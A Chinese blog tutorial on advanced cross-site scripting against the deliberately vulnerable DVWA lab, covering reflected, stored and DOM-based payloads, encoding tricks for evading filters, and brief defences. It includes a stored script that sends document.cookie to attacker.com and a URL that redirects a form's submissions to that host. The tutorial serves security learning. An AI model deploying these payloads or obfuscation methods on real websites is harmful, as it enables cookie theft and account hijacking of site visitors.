XSS跨站脚本攻击进阶~婉湖~

于 2024-08-03 15:23:04 发布
阅读量504 收藏 5
点赞数 17
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57898612/article/details/140891105
版权

一、XSS类型回顾

  1. 反射型XSS:恶意脚本通过URL参数传递,并立即在服务器响应中反射回浏览器执行。
  2. 存储型XSS:恶意脚本存储在服务器端,当其他用户访问相关页面时,恶意脚本被执行。
  3. DOM型XSS:恶意脚本通过修改网页的DOM结构执行,通常发生在客户端。

二、工具准备

在本教程中,我们将使用以下工具和环境:

  • Kali Linux
  • DVWA(Damn Vulnerable Web Application)
  • Burp Suite
安装DVWA

参考之前的步骤安装和配置DVWA。

三、高级XSS攻击技巧

1. 反射型XSS的复杂Payload

反射型XSS攻击的Payload可以设计得更复杂,绕过基本的过滤和防御措施。我们可以使用Burp Suite来拦截和修改请求。

步骤:

  1. 启动Burp Suite并配置代理: 启动Burp Suite并设置代理(默认是127.0.0.1:8080)。配置浏览器的代理设置指向Burp Suite。

  2. 拦截请求: 在浏览器中访问DVWA的“XSS (Reflected)”实验。输入简单的Payload(如<script>alert('XSS');</script>)并提交。

  3. 修改Payload: 在Burp Suite中拦截到的请求中,修改Payload为更复杂的形式,如:

<img src=x onerror=alert('XSS')>

  1. 继续请求并观察结果: 继续修改后的请求,你会看到弹窗显示“XSS”。

2. 存储型XSS的持久性Payload

存储型XSS可以通过复杂的Payload实现更持久的攻击效果。例如,使用JavaScript窃取用户Cookie并发送到攻击者服务器。

步骤:

  1. 访问存储型XSS实验: 在浏览器中访问DVWA的“XSS (Stored)”实验。

  2. 提交复杂Payload: 在留言板输入框中输入以下恶意脚本,并点击“Sign Guestbook”:

<script>
var img = new Image();
img.src = 'http://attacker.com/log?cookie=' + document.cookie;
</script>

  1. 观察结果: 你不会立即看到弹窗,但用户访问该页面时,恶意脚本会将用户的Cookie发送到攻击者的服务器。

3. DOM型XSS的高级利用

DOM型XSS可以通过复杂的DOM操作和JavaScript来实现更隐蔽的攻击。例如,劫持表单提交或动态注入内容。

步骤:

  1. 访问DOM型XSS实验: 在浏览器中访问DVWA的“XSS (DOM)”实验。

  2. 构造恶意URL: 在浏览器地址栏输入以下URL,并按Enter键:

http://localhost/DVWA/vulnerabilities/xss_d/?default=<script>document.forms[0].action='http://attacker.com';</script>

  1. 观察结果: 该脚本将修改表单的提交地址,用户提交表单时数据将发送到攻击者的服务器。

四、XSS Payload编码和混淆技术

为了绕过防御机制和过滤规则,攻击者常常会对XSS Payload进行编码和混淆。

1. URL编码

将恶意脚本中的特殊字符编码为URL编码形式,例如<编码为%3C>编码为%3E

示例:

<script>alert('XSS');</script>

 编码为:

%3Cscript%3Ealert('XSS')%3C/script%3E
2. HTML实体编码

将特殊字符编码为HTML实体,例如<编码为&lt;>编码为&gt;

示例:

<script>alert('XSS');</script>

 编码为:

&lt;script&gt;alert('XSS')&lt;/script&gt;
3. JavaScript编码

使用JavaScript的字符编码方式,例如alert编码为\x61\x6C\x65\x72\x74

示例:

<script>alert('XSS');</script>

编码为:

<script>\x61\x6C\x65\x72\x74('XSS');</script>

五、防御高级XSS攻击

为了防御高级XSS攻击,可以采取以下措施:

  1. 输入验证和输出编码: 对用户输入进行严格的验证和过滤,并在输出时进行适当的编码。

  2. 使用CSP(内容安全策略): 使用CSP来限制浏览器可以执行的代码,防止恶意脚本执行。

  3. 安全编码实践: 在开发Web应用时,遵循安全编码实践,确保所有用户输入都经过处理和验证。

  4. 定期安全测试: 定期对Web应用进行安全测试和代码审计,及时发现和修复XSS漏洞。

六、总结

XSS攻击是Web安全中的一种常见威胁,通过深入理解和掌握复杂的Payload和编码技术,可以更有效地进行XSS漏洞测试和防御。

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~哟~~~~~~~~~~~~~~~

 

 

 

 

 

Hi, how are you
关注
  • 17
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS跨站脚本攻击)攻击与防御
zhaohong_bo的专栏
05-21 1095
一、 XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用户...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击及防护
weixin_62707591的博客
06-18 3216
XSS又叫CSS),即跨站脚本攻击,是最常见的 Web 应用程序安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环,通过XSS,黑客可以得到的最直接利益就是拿到用户浏览器的 cookie,从而变相盗取用户的账号密码,进而非授权的获取关键的隐私信息。XSS攻击是一种客户端访问嵌入有恶意脚本代码的Web页面,从而盗取信息、利用身份等的一种攻击行为。XSS属于客户端攻击受害者最终是用户。XSS的传播性极强,由于 web 的特点是轻量级灵活性高。
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
热门推荐
数据知道的博客
08-29 3万+
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS(Cross Site Scripting)跨站脚本攻击,是一种网站应用程序的安全漏洞攻击。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。...
【安全】XSS跨站脚本攻击及防御
漆黑梦工厂
01-19 1051
例如,在Java中可以使用ESAPI库中提供的函数进行输入验证和输出过滤,以确保用户输入的数据不会包含任何恶意的脚本。是一种常见的Web安全漏洞,攻击者通过注入恶意代码到网页中,使得这些代码被其他用户的浏览器执行,从而攻击用户的计算机系统。当其他用户访问该页面并搜索该关键词时,这段恶意代码就会被服务器返回给用户的浏览器执行,从而弹出一个警告框,对用户进行攻击。当其他用户访问该URL时,这段恶意代码就会被服务器返回给用户的浏览器执行,从而弹出一个警告框,对用户进行攻击。
xss跨站脚本攻击总结
太阳照耀我走四方
07-16 2121
svg onload="alert(1)"> //onerror 当加载文档或图像时发生某个错误无的弹窗语句onclick="alert(1)" //鼠标单击事件onmouseover="alert(1)" //鼠标悬浮事件最后还有很多的绕过姿势,推荐博客cookie:存储本地 存活时间较长 小中型session: 会话 存储服务器 存活时间较短 大型企业使用。
渗透测试——八、网站漏洞——XSS跨站脚本攻击
钟言的博客
12-08 1万+
本篇为学习渗透测试的第八篇,网站漏洞之XSS跨站脚本攻击,详细内容包含了:XSS的定义 XSS的分类XSS的攻击手段四、XSS(DOM型)网页之XSS测试五、XSS(反射型)网页之测试六、XSS(存储型)网页之测试等等
XSS跨站脚本攻击(基础详解)
cike_y
01-10 3068
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
网络安全——XSS跨站脚本攻击
weixin_54055099的博客
09-16 4249
XSS跨站脚本攻击,DVWA靶机的三种类型三个等级的操作
网络安全进阶学习第二课——XSS跨站脚本攻击
p36273的博客
06-17 2065
首先了解什么是前端前端从定义上来讲是指一个网站的前台部分,是展示给用户看的部分。它不需要关注任何业务之间的逻辑处理,只需要安安静静地做好自己,老老实实的把自己最美的一面展示给用户。Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。无论何时用户链接到服务器,Web 站点都可以访问 Cookie 信息。Cookie 是临时的或者是持续的。
详解XSS跨站脚本攻击原理及防御
杜小白的博客
04-21 7619
一、XSS跨站脚本攻击跨站脚本攻击,英文全称是Cross Site Script,本来缩写是CSS,但是为了和层叠样式表CSS有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“s跨站脚本”。但是发展到今天,由于javascript的强大功能以...
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS跨站脚本攻击
01-27
跨站脚本攻击XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充分的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
解析如何防止XSS跨站脚本攻击
01-31
这些规则适用于所有不同类别的XSS跨站脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在...
CTFHub——XSS——反射型
qq_48368964的博客
08-01 297
平台测试语句注入,将得到的url编码地址填入url框(此过程模拟用户被诱导点击链接)发现为表单式,猜测哪个可能存在注入漏洞,分别做测试注入发现name框存在。但不是对方cookie,参考wp发现要用xss线上平台。
WEB渗透Web突破篇-XSS
qq_59468567的博客
07-31 261
https://websecblog.com/vulns/google-csp-evaluator/ " http://hsts.pro/csp.php?xss=f=document.createElement%28%22iframe%22%29;f.id=%22pwn%22;f.src=%22/robots.txt%22;f.onload=%28%29=%3E
.net # 检查 带有pdf xss
空灵的专栏
08-02 391
除了上面的iTextSharp ,还有itext7也是做pdf相关处理的。iTextSharp 已经停止更新两年了,如果要开发建议用itext7,上述代码进攻参考,因为版本不一样,调用接口也会不一样,开发时候请查相关api具体内容。1.解决pdf含javasprct脚本动作,这里是验证pdf内部事件。//应用的地方 写入缓存比较好,因为是非报错判断成功后可进行保存。2.下面介绍一下读取pdf内容的脚本内容,仅做参考。3.如何制作带脚本pdf ,请参考下面博文。
CTFHub XSS DOM 跳转
最新发布
qq_48368964的博客
08-02 258
当你将类似于 location.href = "javascript:alert('xss')" 这样的代码赋值给 location.href 时,浏览器会将其解释为一种特殊的URL方案,即 “javascript:”。在这种情况下,浏览器会将后面的 JavaScript 代码作为URL的一部分进行解析,然后执行它。发现可以 老步骤 去xssaq.com上 复制一个 src来 接受 flag。直接在网页url后面跟上代码测试反弹。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值